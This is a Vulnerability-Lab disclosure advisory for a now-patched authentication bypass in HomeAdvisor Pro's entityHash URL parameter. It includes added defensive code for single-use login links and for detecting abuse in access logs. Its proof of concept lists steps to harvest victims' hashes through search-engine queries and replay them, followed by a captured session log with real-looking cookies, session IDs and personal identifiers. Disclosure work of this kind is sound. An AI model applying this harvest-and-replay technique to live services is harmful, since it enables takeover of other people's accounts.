HomeAdvisor Pro - EntityHash Auth Bypass Vulnerability

Document Title:
===============
HomeAdvisor Pro - EntityHash Auth Bypass Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1557

Video: https://www.vulnerability-lab.com/get_content.php?id=1929


Release Date:
=============
2018-07-19


Vulnerability Laboratory ID (VL-ID):
====================================
1557


Common Vulnerability Scoring System:
====================================
9.6


Vulnerability Class:
====================
Authentication Bypass


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
Over 30 million homeowners have trusted HomeAdvisor to help them find quality pros with the expertise to turn their home improvement 
dreams into reality. It's just one of the reasons you can depend on us to bring you highly targeted prospects that will grow 
your business. Getting started is easy. Sign up today and let us help you grow your business, one homeowner at a time.

(Copy of the Vendor Homepage: https://pro.homeadvisor.com/how-it-works/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an auth bypass session vulnerability in the official HomeAdvisor online service web-application.


Vulnerability Disclosure Timeline:
==================================
2018-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Bug Bounty Program


Technical Details & Description:
================================
An entityHash auth bypass session vulnerability has been discovered in the official HomeAdvisor Pro online service web-application.
The auth bypass session vulnerability allows remote attackers to gain access to another user's secure profile information and data.

The vulnerability is located in the entityHash= parameter of HomeAdvisor Pro. When an attacker changes the entityHash= value to 
the victim's entityHash= value, the attacker is logged in without any secure confirmation. Because the value is carried in the 
URL, the entityHash values of HomeAdvisor Pro users can be captured from Google or other crawlers that have indexed them. The same 
vulnerability type was first disclosed by our team to the Microsoft Yammer bug bounty program in 2013. The root cause is that 
there is no second authentication approval of the entityHash, so an auth bypass in connection with the hash can result in the 
takeover of another account. The hash is not securely approved, and possession of the entityHash alone therefore results in an 
auth bypass. A further trick to bypass is for the attacker to use the user id that is attached to the request next to the entityHash.

The security risk of the auth bypass vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 9.6.
Exploitation of the critical auth bypass web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the vulnerability results in user account and account system compromise by manipulation or infiltration.

Vulnerable Parameter(s):
[+] entityHash
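The weakness described above is that the identifier in the link is itself the credential: whoever presents a valid entityHash is logged in, with no second approval, no expiry and no single-use check. The following is an added example (not HomeAdvisor's code and not from the advisory) that places that weak pattern beside a hardened login-link design; the user store, the 15-minute lifetime, the HMAC key and all function names are assumptions for illustration.

```python
"""Added example, not HomeAdvisor's code: the weak 'the entityHash in the URL
logs you in' pattern beside a hardened login-link design.  All names, the user
store and the policy values are assumptions for illustration."""
import hashlib
import hmac
import secrets
import time

# Constructed user store (assumption): user id -> profile.
USERS = {"11928834": {"name": "Samir"}, "20000001": {"name": "Other Pro"}}


# --- Weak pattern: the identifier in the link IS the credential -------------
def weak_login(entity_hash):
    """Log in whoever the hash names. Nothing else is checked, so any party
    that sees the link (a crawler, a referrer log, a shared screenshot) can
    replay it; the digest part is never verified against anything."""
    user_id, _sep, _digest = entity_hash.partition("_")
    if user_id in USERS:
        return {"user": user_id, "via": "entityHash"}
    return None


# --- Hardened pattern: short-lived, single-use, server-side tracked link -----
class LoginLinkService:
    """A login link proves possession of a random token issued to one user.
    The token is stored server-side, expires, is consumed on first use and is
    HMAC-tagged so a tampered or guessed value is rejected before lookup."""

    TTL = 15 * 60  # seconds a link stays valid (assumed policy)

    def __init__(self, server_key):
        self._key = server_key
        self._pending = {}  # token id -> (user id, expiry timestamp)

    def _tag(self, token_id, user_id):
        msg = f"{token_id}.{user_id}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest().encode()

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        token_id = secrets.token_urlsafe(16)  # random, not derived from the user id
        self._pending[token_id] = (user_id, now + self.TTL)
        return f"{token_id}.{self._tag(token_id, user_id).decode()}"

    def redeem(self, link, claimed_user, now=None):
        """Return a session only if the link is intact, unexpired, unused and
        issued for exactly the user the request claims to be."""
        now = time.time() if now is None else now
        token_id, _sep, tag = link.partition(".")
        # Verify the tag before touching state so junk cannot burn a real token.
        if not hmac.compare_digest(tag.encode(), self._tag(token_id, claimed_user)):
            return None
        entry = self._pending.pop(token_id, None)  # single use: consumed here
        if entry is None:
            return None
        user_id, expiry = entry
        if user_id != claimed_user or now > expiry:
            return None
        return {"user": user_id, "via": "login-link"}


def response_for(session):
    """Redirect after login with headers that keep the link out of caches and
    out of third-party Referer headers (assumed defensive defaults)."""
    if session is None:
        return 401, {}
    return 302, {"Location": "/", "Cache-Control": "no-store",
                 "Referrer-Policy": "no-referrer"}


if __name__ == "__main__":
    svc = LoginLinkService(b"constructed-server-key")
    link = svc.issue("11928834")
    print("first redeem :", svc.redeem(link, "11928834"))
    print("second redeem:", svc.redeem(link, "11928834"))  # consumed
```

The design point is that the random token is the only secret, it lives in server-side state rather than being derivable from the user id, and redeeming it once removes it, so a link that leaks through a search index later is worthless.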


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.


Manual steps to reproduce the vulnerability ...
1. Open https://pro.homeadvisor.com
2. Search in Google for: site:pro.homeadvisor.com/ entityHash=
3. Collect some entityHash values of clients from the results
4. Change the entityHash= value to the entityHash= value of a random victim by intercepting the traffic or via a live HTTP tamper tool
5. Perform the request via GET method to the HomeAdvisor service application
Now you are logged in with a valid session under the victim's entityHash value.
Note: When you change the entityHash value to the victim's via tamper, you are logged in just by changing the entityHash= value.


--- PoC Session Logs ---
Status: 301[Moved Permanently]
GET https://pro.homeadvisor.com/servlet/HomeServlet?entityHash=11928834_396bc39710bdad7504a4807feeef1817
Mime Type[application/x-unknown-content-type]
        Request Headers:
        Host[pro.homeadvisor.com]
        User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
        Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
        Cookie[originatingSessionID="1337"; csacn=746971; csdcn=1437478941849; psacn=746971; psdcn=1437478121418; 
optimizelyEndUserId=oeu1429704431469r0.8701083976370677; v71=%5B%5B%27Referrers%27%2C%271437473444057%27%5D%2C%5B%27Type-In%27%2C%271437473599713%27%5D%2C%5B%27
Referrers%27%2C%271437476175935%27%5D%2C%5B%27Type-In%27%2C%271437476183081%27%5D%2C%5B%27Email%27%2C%271437476340853%27%5D%2C%5B%27Type-In%27%2C%27143747649728
9%27%5D%2C%5B%27Email%27%2C%271437477034239%27%5D%2C%5B%27Type-In%27%2C%271437477132544%27%5D%2C%5B%27Referrers%27%2C%271437477971178%27%5D%2C%5B%27Type-In%27%2
C%271437478182352%27%5D%5D; fsr.r=%7B%22d%22%3A90%2C%22i%22%3A%22d5e2305-49433661-607d-7166-b4aa3%22%2C%22e%22%3A1430309540199%7D; s_fid=26A640D6D01EEF1E-27AB9
4756408D960; s_dslv2=1437478802329; optimizelySegments=%7B%22192702441%22%3A%22ff%22%2C%22192663147%22%3A%22false%22%2C%22192690192%22%3A%22none%22%2C%22192644
497%22%3A%22referral%22%2C%223034470465%22%3A%22true%22%2C%223018270184%22%3A%22true%22%2C%223013960429%22%3A%22true%22%2C%222403180023%22%3A%22true%22%7D; opti
mizelyBuckets=%7B%222994180103%22%3A%222999960067%22%2C%223126860572%22%3A%223123860510%22%7D; __utma=65920055.2074902274.1429704432.1437473373.1437477940.6; __
utmz=65920055.1429704432.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); s_vi=[CS]v1|2A9BC79185011597-600001136000151A[CE]; s_gnr=1437
478802331-Repeat; s_vnum=1438383600051%26vn%3D3; _ivu=A3BF18A6-D7AF-4BDE-834F-C3FD2FDD2C99; __gads=ID=fe1944bfab77b958:T=1435889440:S=ALNI_MbHVWIV_urncurn-m_oEuak
LS1g9A; __utma=168469472.339370364.1435889637.1437473444.1437476340.5; __utmz=168469472.1437476340.5.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%2
0provided); __ar_v4=OBIU2LI5ZFELBJFDGHFF5S%3A20150702%3A167%7C4SFWD66ESVAFDCGDKRX43R%3A20150702%3A167%7C2LYJLG4RLJCKZCOW7TRWTE%3A20150702%3A167%7CGYZQKVMPWJBZBP4OC
B6CM4%3A20150720%3A193%7CIUECRTQC6ZC77PLZBQQ6ZP%3A20150720%3A193%7CKCYCVZHJ7FAAZBDQKGHHAY%3A20150720%3A193; _gig_llp=facebook; _gig_llu=Samir; __qca=P0-1342044628-1
435894942731; v72=%5B%5B%27EM-15727939%27%2C%2
71435895145385%27%5D%2C%5B%27EM-15727939%27%2C%271435895596636%27%5D%2C%5B%27EM-15727939%27%2C%271437476340855%27%5D%2C%5B%27EM-15727939%27%2C%271437477034240%27%5
D%5D; sess_log=1437478121418pwspr00841515EDC235E3F21DAE93527415D3E01; TS01a79be6=0109d29b8d01d791112555e8647b1ccf4bc0fa66ab89aa52622d0c4d77fcf08ea60e991c70e7cd768d1351
eeb37e5b4e0e9d4e8db7697a4b735723fbc02bd2224254679ec3748a5ffa6ee81654a
4445e9e46eed3ba316d22a832511a443958e63a0e84c217af9bde02e5ff2f0015161c4730fbdfb120ed37c0069f4e8e3b58a346499bb5ce; s_cc=true; s_eVar8=unknown; fpv=1; 
c_m=undefinedType-InType-In; s_e69=Type-In; s_evar46=5%3A30AM; s_evar47=Tuesday; s_evar48=Weekday; s_dslv2_s=More%20than%207%20days; s_gnr2=Repeat; s_invisit=true; 
s_visNum=3; s_ppv=31; v11=41.104.137.97; s_sq=%5B%5BB%5D%5D; fsr.s=%7B%22cp%22%3A%7B%22zipCode%22%3A%22%22%2C%22ActionName%22%3A%22%20
Spanish_Checkbox_32226_0113_spanchk%22%2C%22loggedIn%22%3A%22false%22%2C%22entryPage%22%3A%22%2FWEB-INF%2Fjsp%2Fsp%2Ferrorpages%2Ferror.jsp%22%2C%22sessionID%22%3A
%221437476975551pwspr050.homeadvisor.comC7A8DB62858CB2098E29BF24C48C092B.pwspr050-1%22%2C%22userID%22%3A%2211928834%22%2C%22affiliateID%22%3A%223843876%22%2C%22
categoryID%22%3A%220%22%2C%22SP%20Type%22%3A%22ProFinder%22%7D%2C%22v1%22%3A-2%2C%22v2%22%3A-2%2C%22rid%22%3A%22d5e2305-49374835-08a4-4b0c-b969e%22%2C%22to%22%3
A4.7%2C%22c%22%3A%22https%3A%2F%2Fpro.homeadvisor.com%2F%22%2C%22pv%22%3A100%2C%22lc%22%3A%7B%22d1%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%2C%22d0%22%3A%7B%22v%22
%3A80%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22f%22%3A1437478801866%2C%22sd%22%3A0%7D; __utmc=65920055; s_e17=event17; s_eVar55=11928834; s_spid=24662366; 
JSESSIONID=C7A8DB62858CB2098E29BF24C48C092B.pwspr050-1; aff_track=2|*|3843876|*|15727939; ServerID=503949504.20480.0000; TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262464155a8619369b41c16001e8ea4934a70f9e98c52fea
a9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e99316d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; TS01a764fb=0109d29b8dfd5e5e7e4e41488c4639209211ebb0972c67fcc7542e553b2d46e07bb44971d154da4d10911ffda6566d508608c1223eefb105abbda02c6e5d5e38a49199ccf90c0dfb5abcdba0e
fa9b7246056f9ef59910ed8e57daa343c56497e2edfa46317fc1b82171e1fa666d4b4c5d18fe0daf57dfb7e0910e8371b3babc0612e9b3acc; __utmb=168469472.45.10.1437476340; 
__utmc=168469472; ctqc=0; __utmb=65920055.1.10.1437477940; __utmt=1]
        X-Forwarded-For[8.8.8.8]
        Connection[keep-alive]
        Response Headers:
        Location[https://pro.homeadvisor.com/]
        Connection[Keep-Alive]
        Set-Cookie[ServerID=503949504.20480.0000; 
	expires=; 
	path=/TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262
	464155a8619369b41c16001e8ea4934a70f9e98c52feaa9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e993
	16d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; Path=/]


Reference(s):
https://pro.homeadvisor.com/
https://pro.homeadvisor.com/servlet/
https://pro.homeadvisor.com/servlet/HomeServlet
https://pro.homeadvisor.com/servlet/HomeServlet?entityHash
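The session log above shows what the abuse looks like on the wire: a GET to the servlet carrying someone else's entityHash, answered with a 301 into a logged-in session. Requests of that shape are visible in ordinary access logs, so a defender can look for the signals the advisory implies: one entityHash presented from several client addresses, entityHash requests arriving with a search-engine Referer (the value has been indexed), and one client cycling through many distinct hashes. The following is an added example (not HomeAdvisor's or Vulnerability-Lab's code); the log format, the constructed sample lines, the search-engine list and the threshold of three hashes per client are all assumptions.

```python
"""Added example, not HomeAdvisor's or Vulnerability-Lab's code: spot
entityHash abuse in web-server access logs.  Log format, thresholds and the
sample lines are constructed assumptions for illustration."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined-log-like; IPs from documentation ranges,
# hashes are placeholders shaped like the userid_digest values in the advisory).
SAMPLE_LOG = """\
198.51.100.7 - - [19/Jul/2018:05:30:01 +0000] "GET /servlet/HomeServlet?entityHash=11111111_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1" 301 0 "-"
203.0.113.5 - - [19/Jul/2018:05:31:12 +0000] "GET /servlet/HomeServlet?entityHash=11111111_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1" 301 0 "https://www.google.com/"
198.51.100.9 - - [19/Jul/2018:05:32:40 +0000] "GET /servlet/HomeServlet?entityHash=22222222_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb HTTP/1.1" 301 0 "-"
203.0.113.5 - - [19/Jul/2018:05:33:05 +0000] "GET /servlet/HomeServlet?entityHash=33333333_cccccccccccccccccccccccccccccccc HTTP/1.1" 301 0 "-"
203.0.113.5 - - [19/Jul/2018:05:33:51 +0000] "GET /servlet/HomeServlet?entityHash=44444444_dddddddddddddddddddddddddddddddd HTTP/1.1" 301 0 "-"
198.51.100.7 - - [19/Jul/2018:05:34:10 +0000] "GET /how-it-works/ HTTP/1.1" 200 5120 "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
SEARCH_ENGINES = ("google.", "bing.", "yahoo.", "duckduckgo.")  # assumed list
MULTI_HASH_THRESHOLD = 3  # assumed: distinct hashes per client before flagging


def parse_line(line):
    """Return the fields of one log line plus its entityHash, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = parse_qs(urlsplit(rec["target"]).query)
    rec["entity_hash"] = query.get("entityHash", [None])[0]
    return rec


def analyze(log_text):
    """Aggregate entityHash usage and return the three suspicious patterns."""
    ips_per_hash = defaultdict(set)
    hashes_per_ip = defaultdict(set)
    search_referrals = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["entity_hash"]:
            continue
        h, ip = rec["entity_hash"], rec["ip"]
        ips_per_hash[h].add(ip)
        hashes_per_ip[ip].add(h)
        host = urlsplit(rec["referer"]).netloc.lower()
        if any(engine in host for engine in SEARCH_ENGINES):
            search_referrals.append((ip, h))  # value reached us via a search index
    return {
        # one hash presented from more than one client address
        "shared_hashes": {h: sorted(ips) for h, ips in ips_per_hash.items() if len(ips) > 1},
        # hash requests whose Referer is a search engine
        "search_referrals": search_referrals,
        # one client presenting many different hashes (harvesting pattern)
        "multi_hash_clients": {ip: len(hs) for ip, hs in hashes_per_ip.items()
                               if len(hs) >= MULTI_HASH_THRESHOLD},
    }


if __name__ == "__main__":
    for name, finding in analyze(SAMPLE_LOG).items():
        print(f"{name}: {finding}")
```

In practice the same aggregation would run over a time window rather than a whole file, and a shared hash is the strongest of the three signals, since a legitimate user rarely presents the same link from two networks within minutes.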


Solution - Fix & Patch:
=======================
The vulnerability was reported to the manufacturer's official bug bounty program in 2016 Q3 - Q4. 
The security issue was resolved by the HomeAdvisor developer team in 2017 Q3 - Q4. 
The disclosure process around the issue took about 8 months.


Security Risk:
==============
The security risk of the authentication bypass vulnerability in the entityHash is estimated as critical. 


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™